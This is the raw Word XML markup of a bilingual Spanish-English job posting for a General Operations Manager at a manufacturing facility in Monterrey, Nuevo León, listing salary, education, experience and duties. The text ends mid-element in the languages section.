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93C29" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRDefault="006B028A" w:rsidP="006B028A">
      <w:pPr>
        <w:ind w:right="-1350"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142D9BE5" wp14:editId="34C24FEC">
            <wp:extent cx="2110105" cy="8826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ecco_Logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2110235" cy="882684"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="102" w:type="dxa"/>
          <w:left w:w="102" w:type="dxa"/>
          <w:bottom w:w="102" w:type="dxa"/>
          <w:right w:w="102" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8940"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="1792D48A" w14:textId="77777777" w:rsidTr="00F306E4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="150" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="150" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3825D1DA" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DF073AF" w14:textId="77777777" w:rsidR="006B028A" w:rsidRDefault="006B028A" w:rsidP="00F306E4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C92D219" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F306E4">
              <w:rPr>
                <w:b/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>General Operations Manager</w:t>
            </w:r>
            <w:r w:rsidRPr="00F306E4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F306E4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Número</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F306E4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F306E4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Vacante</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F306E4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: 66745</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="1CC940ED" w14:textId="77777777" w:rsidTr="00F306E4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="75" w:type="dxa"/>
              <w:bottom w:w="75" w:type="dxa"/>
              <w:right w:w="75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="10110" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:sz="12" w:space="0" w:color="DFDFDF"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="DFDFDF"/>
                <w:bottom w:val="single" w:sz="12" w:space="0" w:color="DFDFDF"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="DFDFDF"/>
              </w:tblBorders>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="5055"/>
              <w:gridCol w:w="5055"/>
            </w:tblGrid>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="2C9BE35B" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="76F0623C" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Área</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Operativos</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="7EF58929" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Ciudad</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>: </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Monterrey</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="68298DBA" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="736DDE77" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Sueldo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 45,000 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Mensual</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="58FC7536" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Estado</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>: </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Nuevo León</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1D2F151B" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9074" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="4537"/>
              <w:gridCol w:w="4537"/>
            </w:tblGrid>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="450A0D88" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:trPr>
                <w:trHeight w:val="253"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="32495BF1" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Escolaridad</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4358E9B1" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Tiempo</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> de </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>experiencia</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="0272366C" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:trPr>
                <w:trHeight w:val="253"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="2DB5F944" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="006B028A" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Licenciatura</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> / </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Ingeniería</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="39287DE5" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="61728C03" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="006B028A" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Más</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> de dos </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>años</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="483473C0" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:trPr>
                <w:trHeight w:val="253"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="729E6CDA" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Experiencia</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Requerida</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="42C2DA10" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Principales</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>tareas</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="14FBB18B" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:trPr>
                <w:trHeight w:val="3075"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="1F4961B9" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>A Bachelors Degree in Business, Engineering or similar is required; 5 year minimum experience in a leading manufacturing facility will be requested. Continuous improvements initiative (Six Sigma) and experience with lean manufacturing will be a determinant in the selection process. English and excellent communication skills (both verbal and written) are a must.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="5D36A8EF" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Your principal responsibilities will be to provide general management and oversee the local finance, logistics, manufacturing, engineering and human resources team. Review financial reports and other performance data to measure performance and productivity to compare them against established objectives. Analyze and identify cost reduction areas and program improvement. Support Human Resources with the negotiations involving any labor relations in a unionized facility and coordinate and work with the global sales team to review sales forecast and ensure manufacturing availability.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="3D86F2F4" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:trPr>
                <w:trHeight w:val="233"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="16D6D75F" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Conocimientos</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> en </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>informática</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4B1121FD" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="6B51D5E0" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Comentarios</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="67CD29A7" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:trPr>
                <w:trHeight w:val="233"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="7D2348CA" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4DAC5888" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="006B028A" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>N/A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="37FD59E1" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:trPr>
                <w:trHeight w:val="253"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="44C3DA1D" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Idiomas</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="28935A56" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Información</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F306E4">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>adicional</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00F306E4" w:rsidRPr="00F306E4" w14:paraId="51DB25A0" w14:textId="77777777" w:rsidTr="00F306E4">
              <w:trPr>
                <w:trHeight w:val="253"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4537" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="0D6DCEE7" w14:textId="77777777" w:rsidR="00F306E4" w:rsidRPr="00F306E4" w:rsidRDefault="00F306E4" w:rsidP="00F306E4">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve">* </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006B028A">
                    <w:rPr>
                      <w:b/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Inglés</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006B028A">
